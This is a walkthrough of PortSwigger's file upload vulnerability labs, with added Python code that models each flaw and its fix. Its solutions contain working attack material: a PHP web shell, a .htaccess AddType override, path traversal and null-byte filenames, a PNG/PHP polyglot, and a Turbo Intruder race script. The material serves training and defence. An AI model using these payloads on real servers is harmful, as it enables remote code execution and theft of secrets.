PortSwigger file upload vulnerability labs

Remote code execution via web shell upload

Lab

file-upload-remote-code-execution-via-web-shell-upload

Description

This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

The task is to read a file's contents, so create a new file containing this PHP:

<?php echo file_get_contents('/home/carlos/secret'); ?>

Upload that file through the avatar upload on the account page.

Then request the uploaded file at its image link, /files/avatars/evil.php (evil.php being the name given to the file here).

The response is the contents of /home/carlos/secret; submit it.

Web shell upload via Content-Type restriction bypass

Lab

file-upload-web-shell-upload-via-content-type-restriction-bypass

Description

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

On the account page, try uploading a PHP file with the following code through the avatar upload. The response rejects it, saying that only the image/png type is allowed.

<?php echo file_get_contents('/home/carlos/secret'); ?>

Edit the Content-Type header of the file part inside the multipart body (not the request's top-level Content-Type) to:

Content-Type: image/png

The check only looks at this client-supplied header, so the upload is accepted. Request the uploaded image, read the file contents and submit them to pass.

Web shell upload via path traversal

Lab

file-upload-web-shell-upload-via-path-traversal

Description

This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

On the account page, try uploading a PHP file with this code through the avatar upload:

<?php echo file_get_contents('/home/carlos/secret'); ?>

Request the image: the PHP source is returned verbatim, so PHP files in the avatars directory are not executed.

Edit the upload POST request: in the Content-Disposition header of the file part, prepend ../ to the filename value and resubmit.

The server's response is no different from before, which suggests it strips / (or the ../ sequence) from the filename. Replace the / with its URL-encoded form %2f and resubmit; this time the server reports that ../evil.php (the filename used here) has been uploaded successfully, because the traversal sequence is only decoded after the check.

Request the uploaded file, which now sits one directory above avatars/ where PHP is executed, read the file contents and submit them to pass.
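The write-up's guess above (the server removes a literal ../ but decodes %2f only when it builds the path) can be modelled in a few lines. The following is an added example, not the lab's server code or PortSwigger's solution: the directory layout (/var/www/files served as /files/, avatars written under /var/www/files/avatars) and the strip-then-decode order are assumptions made for the model. It places the vulnerable path construction beside a hardened one that decodes first, keeps only the final path component and verifies the result stays inside the upload directory. Only posixpath is used, so no files are touched.

```python
import posixpath
from urllib.parse import unquote

# Constructed layout for the model (not taken from the lab's real server):
# /var/www/files is what the web server exposes as /files/, and avatars are
# written one level below it.
UPLOAD_DIR = "/var/www/files/avatars"


def vulnerable_store_path(filename: str) -> str:
    """Behaviour inferred in the write-up: a literal '../' is removed from the
    raw multipart filename, and the name is URL-decoded only afterwards when
    the on-disk path is built. '../' is neutralised; '..%2f' passes the
    check and turns into '../' during decoding."""
    cleaned = filename.replace("../", "")
    decoded = unquote(cleaned)
    return posixpath.normpath(posixpath.join(UPLOAD_DIR, decoded))


def safe_store_path(filename: str) -> str:
    """Hardened equivalent: decode first, keep only the last path component
    (treating backslashes as separators too), then verify that the normalised
    result is still inside UPLOAD_DIR."""
    decoded = unquote(filename)
    name = posixpath.basename(decoded.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise ValueError("empty or traversal-only filename")
    target = posixpath.normpath(posixpath.join(UPLOAD_DIR, name))
    if posixpath.commonpath([target, UPLOAD_DIR]) != UPLOAD_DIR:
        raise ValueError("path escapes the upload directory")
    return target


def safe_store_path_rejects(filename: str) -> bool:
    """True if the hardened function refuses the supplied filename."""
    try:
        safe_store_path(filename)
    except ValueError:
        return True
    return False


def escapes_upload_dir(path: str) -> bool:
    """Did a stored path land outside the avatars directory?"""
    return posixpath.commonpath([path, UPLOAD_DIR]) != UPLOAD_DIR


if __name__ == "__main__":
    for name in ["evil.php", "../evil.php", "..%2fevil.php", "%2e%2e%2fevil.php"]:
        vuln = vulnerable_store_path(name)
        print(f"{name:22} vulnerable -> {vuln} (escapes: {escapes_upload_dir(vuln)})")
        verdict = "rejected" if safe_store_path_rejects(name) else safe_store_path(name)
        print(f"{'':22} safe       -> {verdict}")
```

The decisive detail is ordering: any sanitisation applied before decoding can be undone by the decode step, so canonicalise (decode, normalise separators) first and only then check. Note that the hardened version does not depend on recognising every traversal spelling; the final commonpath check rejects anything that ends up outside UPLOAD_DIR regardless of how it was encoded.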

Web shell upload via extension blacklist bypass

Lab

file-upload-web-shell-upload-via-extension-blacklist-bypass

Description

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

On the account page, try uploading a PHP file with this code through the avatar upload:

<?php echo file_get_contents('/home/carlos/secret'); ?>

The server responds that PHP files are not allowed. Edit the request: change the filename to .htaccess,

change the Content-Type of the file part to text/plain,

and replace the file contents with:

AddType application/x-httpd-php .l33t

Submit the request. Apache reads the uploaded .htaccess as the per-directory configuration for avatars/ and applies it, so files with the .l33t extension in that directory are now handed to the PHP module. This works only because the directory is served with an AllowOverride setting that honours FileInfo directives such as AddType (and because PHP runs in-process as mod_php); the blacklist is flawed in that it blocks .php but not the extension that controls which extensions are executable.

Submit the PHP file again, this time with its extension changed from .php to .l33t.

Request the uploaded file, read the file contents and submit them to pass.

Web shell upload via obfuscated file extension

Lab

file-upload-web-shell-upload-via-obfuscated-file-extension

Description

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

On the account page, try uploading a PHP file with this code through the avatar upload:

<?php echo file_get_contents('/home/carlos/secret'); ?>

The server responds that only PNG or JPG files are accepted. PortSwigger's notes list the relevant trick:

  • Add semicolons or URL-encoded null byte characters before the file extension. If validation is written in a high-level language like PHP or Java, but the server processes the file using lower-level functions in C/C++, for example, this can cause discrepancies in what is treated as the end of the filename: exploit.asp;.jpg or exploit.asp%00.jpg

In other words, if the validator is written in a high-level language (such as PHP) but the file is later handled by lower-level C/C++ code, the %00 null byte may be treated as the end of the filename, so the validator sees a .png while the filesystem sees a .php.

Change the filename in the request to evil.php%00.png and submit. Note that the server responds The file avatars/evil.php has been uploaded.

Request the uploaded file, read the file contents and submit them to pass.
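The discrepancy described above can be made concrete. The following is an added example, not the lab's code: it models a high-level extension check (the text after the last dot, as PHP's pathinfo() computes it) and the NUL-terminated view of the same name that a C-level file API receives. It assumes, for the model, that the framework URL-decodes the multipart filename before validation, so %00 becomes a real NUL byte; the IIS 6 semicolon case quoted in the bullet is included as a second low-level interpretation.

```python
from urllib.parse import unquote

ALLOWED_EXTENSIONS = {"png", "jpg"}


def high_level_extension(filename: str) -> str:
    """Extension as a high-level validator computes it (PHP pathinfo(), or
    Java/Python string functions): everything after the last dot. A NUL
    byte is just another character at this level, so nothing stops there."""
    if "." not in filename:
        return ""
    return filename.rsplit(".", 1)[1].lower()


def validator_accepts(filename: str) -> bool:
    # Assumption for this model: the framework URL-decodes the multipart
    # filename before the extension check runs, turning "%00" into "\x00".
    return high_level_extension(unquote(filename)) in ALLOWED_EXTENSIONS


def c_string(s: str) -> str:
    """What a C-level API (open(2), fopen) receives: a NUL-terminated string,
    so everything from the first \\0 onwards is invisible to it."""
    return s.split("\x00", 1)[0]


def iis6_style_name(s: str) -> str:
    """Historical IIS 6 behaviour: a ';' in the path ends the script name, so
    'exploit.asp;.jpg' is dispatched to the ASP engine as 'exploit.asp'."""
    return s.split(";", 1)[0]


def stored_name(filename: str) -> str:
    """Name the file actually gets on disk under the NUL-truncation model."""
    return c_string(unquote(filename))


def evaluate(filename: str):
    """(validator verdict, name the file actually gets on disk)."""
    return validator_accepts(filename), stored_name(filename)


if __name__ == "__main__":
    for name in ["evil.php", "avatar.png", "evil.php%00.png", "exploit.asp;.jpg"]:
        ok, stored = evaluate(name)
        print(f"{name:18} validator={'accept' if ok else 'reject':6} "
              f"stored as {stored!r}, IIS6 handler name {iis6_style_name(stored)!r}")
```

Two caveats a practitioner should keep in mind. PHP itself has refused paths containing NUL bytes since 5.3.4, so this bypass depends on the specific stack that writes the file, not on PHP in general. And the fix is not to blacklist more characters: decode the name, reject anything with control bytes or path separators, compare the whitelist against the canonical name, and preferably discard the client's filename entirely and generate your own.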

Remote code execution via polyglot web shell upload

Lab

file-upload-remote-code-execution-via-polyglot-web-shell-upload

Description

This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

On the account page, try uploading a PHP file with this code through the avatar upload:

<?php echo file_get_contents('/home/carlos/secret'); ?>

The server responds that only PNG or JPG files are accepted.

On Windows, concatenate a PNG image and the PHP payload with copy in binary mode (the Linux equivalent is cat png.png php.php > pngphp.php):

copy /b png.png + php.php pngphp.php

Upload pngphp.php. When the server inspects the file it looks at the leading bytes, finds the PNG signature and accepts it as a PNG.

Request the uploaded file. Because its extension is .php, the server executes the embedded code: the image bytes are echoed as-is, and at the end of that binary garbage is a plain alphanumeric string, which is the secret the lab asks for.
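The polyglot can be built and checked without Windows or a real image. The following is an added example, not the lab's or PortSwigger's code: it constructs a valid 1x1 PNG from scratch (standing in for png.png), appends the web shell exactly as the copy command does, runs the same kind of magic-byte check the server applies, and models what mod_php emits for the file (bytes outside the PHP tags copied verbatim, the echo replaced by its output). The secret value used in the model is constructed.

```python
import struct
import zlib
from typing import Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
PHP_PAYLOAD = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"


def png_chunk(kind: bytes, data: bytes) -> bytes:
    """Length + type + data + CRC32 over type and data, per the PNG spec."""
    crc = zlib.crc32(kind + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A valid 1x1 RGB PNG constructed here as the stand-in for png.png."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    scanline = b"\x00" + b"\xff\x00\x00"                  # filter None + one red pixel
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanline))
            + png_chunk(b"IEND", b""))


def make_polyglot(image: bytes, payload: bytes = PHP_PAYLOAD) -> bytes:
    """Same result as `copy /b png.png + php.php pngphp.php`: the PHP sits
    after IEND, where PNG decoders ignore trailing data."""
    return image + payload


def sniff_image_type(data: bytes) -> Optional[str]:
    """Magic-byte check of the kind the lab server performs; PHP's
    exif_imagetype() and finfo likewise decide from the leading bytes."""
    if data.startswith(PNG_SIGNATURE):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    return None


def simulate_php_output(data: bytes, secret: bytes) -> bytes:
    """Model of what mod_php emits for the polyglot: everything outside the
    <?php ... ?> block is copied to the response verbatim and the block runs.
    Its only statement echoes the secret, so the secret replaces the tag."""
    start = data.index(b"<?php")
    end = data.index(b"?>", start) + len(b"?>")
    return data[:start] + secret + data[end:]


if __name__ == "__main__":
    poly = make_polyglot(minimal_png())
    with open("pngphp.php", "wb") as fh:
        fh.write(poly)
    print("detected type:", sniff_image_type(poly))
    out = simulate_php_output(poly, b"constructed-secret-value")
    print("response tail:", out[-40:])
```

Concatenation works whenever the check stops at the magic bytes. If the server instead re-encodes the image or truncates trailing data, the usual alternative is to put the payload inside a metadata field that survives processing (for JPEG, a comment written with exiftool), which is why the secret may need to be wrapped in marker strings to find it in the binary output.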

Web shell upload via race condition

Lab

file-upload-web-shell-upload-via-race-condition

Description

This lab contains a vulnerable image upload function. Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Hint

The vulnerable code that introduces this race condition is as follows:

<?php
$target_dir = "avatars/";
$target_file = $target_dir . $_FILES["avatar"]["name"];

// temporary move
move_uploaded_file($_FILES["avatar"]["tmp_name"], $target_file);

if (checkViruses($target_file) && checkFileType($target_file)) {
    echo "The file ". htmlspecialchars( $target_file). " has been uploaded.";
} else {
    unlink($target_file);
    echo "Sorry, there was an error uploading your file.";
    http_response_code(403);
}

function checkViruses($fileName) {
    // checking for viruses
    ...
}

function checkFileType($fileName) {
    $imageFileType = strtolower(pathinfo($fileName,PATHINFO_EXTENSION));
    if($imageFileType != "jpg" && $imageFileType != "png") {
        echo "Sorry, only JPG & PNG files are allowed\n";
        return false;
    } else {
        return true;
    }
}
?>

Solution

On the account page, try uploading a PHP file with this code through the avatar upload:

<?php echo file_get_contents('/home/carlos/secret'); ?>

The response says only PNG/JPG files are accepted.

Look at the source in the hint: the file is moved into the avatars directory before it is checked, and is deleted only if a check fails. Any request for the avatar that arrives within the few tens of milliseconds that checkViruses() and checkFileType() take will hit that window and have the PHP file executed; that is the race condition.

Sending the two requests by hand from Repeater is not fast enough.

Install the Turbo Intruder extension in Burp Suite and write the following script:

def queueRequests(target, wordlists):
    # one connection per queued request, so all of them can be in flight at once
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10)
    request1 = ''' <raw POST request that uploads the PHP web shell> '''
    request2 = ''' <raw GET request for the uploaded avatar> '''
    engine.queue(request1, gate='race1')       # queue the upload behind the gate
    for i in range(5):
        engine.queue(request2, gate='race1')   # queue five avatar reads behind the same gate
    # a gated request is sent except for its final byte; openGate() sends the
    # last byte of all six at once, so the reads land inside the check window
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

Run the attack and inspect the results: three of the five avatar requests came back with status 200. Their responses contain the secret string; submit it to pass.
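The hinted PHP and its fix can be contrasted in a small offline model. The following is an added example, not the lab's code: a vulnerable handler that reproduces the move-then-check-then-unlink order, a hardened one that validates the upload in a directory the web server does not serve and only then renames it into place atomically, and a harness that simulates the attacker's GET arriving inside the validation window (the window is represented by a callback rather than real timing, so the outcome is deterministic). Directory names and the web shell bytes are constructed for the demo.

```python
import os
import tempfile

ALLOWED_EXTENSIONS = {"jpg", "png"}
WEB_SHELL = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"


def check_file_type(path: str) -> bool:
    """Same extension whitelist as checkFileType() in the hinted PHP."""
    return os.path.splitext(path)[1].lower().lstrip(".") in ALLOWED_EXTENSIONS


class VulnerableUploader:
    """Mirrors the hinted PHP: move into the served directory first, validate
    afterwards, unlink on failure. `during_check` stands in for the window
    between move_uploaded_file() and unlink(); the racing GET lands there."""

    def __init__(self, served_dir: str):
        self.served_dir = served_dir

    def handle(self, name: str, data: bytes, during_check=lambda: None) -> bool:
        target = os.path.join(self.served_dir, name)
        with open(target, "wb") as fh:          # "temporary move"
            fh.write(data)
        during_check()
        if check_file_type(target):             # checkViruses() elided, as in the hint
            return True
        os.unlink(target)
        return False


class SafeUploader:
    """Hardened version: the upload is written to a quarantine directory the
    web server never serves, validated there, and only then renamed into the
    served directory with an atomic os.replace(). No unvalidated file ever
    exists under served_dir, so there is no window to race."""

    def __init__(self, served_dir: str, quarantine_dir: str):
        self.served_dir = served_dir
        self.quarantine_dir = quarantine_dir

    def handle(self, name: str, data: bytes, during_check=lambda: None) -> bool:
        fd, tmp = tempfile.mkstemp(dir=self.quarantine_dir)
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        during_check()
        if not check_file_type(name):
            os.unlink(tmp)
            return False
        os.replace(tmp, os.path.join(self.served_dir, name))
        return True


def served_during_window(uploader, name: str, data: bytes) -> bool:
    """Simulate the attacker's GET for /files/avatars/<name> arriving inside
    the validation window: True if it could read the uploaded bytes."""
    seen = {}

    def attacker_get():
        path = os.path.join(uploader.served_dir, name)
        seen["body"] = open(path, "rb").read() if os.path.exists(path) else None

    uploader.handle(name, data, during_check=attacker_get)
    return seen.get("body") == data


def demo():
    """(shell exposed by the vulnerable handler, shell exposed by the safe one)."""
    with tempfile.TemporaryDirectory() as root:
        served = os.path.join(root, "files", "avatars")
        quarantine = os.path.join(root, "quarantine")
        os.makedirs(served)
        os.makedirs(quarantine)
        vuln = served_during_window(VulnerableUploader(served), "evil.php", WEB_SHELL)
        safe = served_during_window(SafeUploader(served, quarantine), "evil.php", WEB_SHELL)
        return vuln, safe


if __name__ == "__main__":
    print("vulnerable handler exposed the shell: %s, safe handler: %s" % demo())
```

The point of the fix is not to make the checks faster (Turbo Intruder will still win some fraction of the time against any finite window) but to remove the window altogether: nothing reachable by URL should exist until validation has finished, and the final step into the served directory should be a single atomic rename.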